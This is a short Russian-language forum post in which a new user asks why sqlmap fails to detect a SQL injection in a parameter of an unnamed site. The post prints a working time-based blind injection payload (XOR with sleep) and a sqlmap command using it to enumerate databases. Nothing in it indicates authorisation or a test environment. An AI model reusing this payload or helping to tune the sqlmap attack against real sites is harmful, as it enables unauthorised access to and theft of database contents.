16.09.2024, 17:27
|
|
Новичок
Регистрация: 12.09.2024
Сообщений: 8
С нами:
879845
Репутация:
0
|
|
Доброго времени суток!
Есть уязвимость в param1
Код:
https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1
, payload выглядит так
Код:
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
.Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так
Код:
sqlmap.py -p param1 -u "https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
, ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap? |
|
|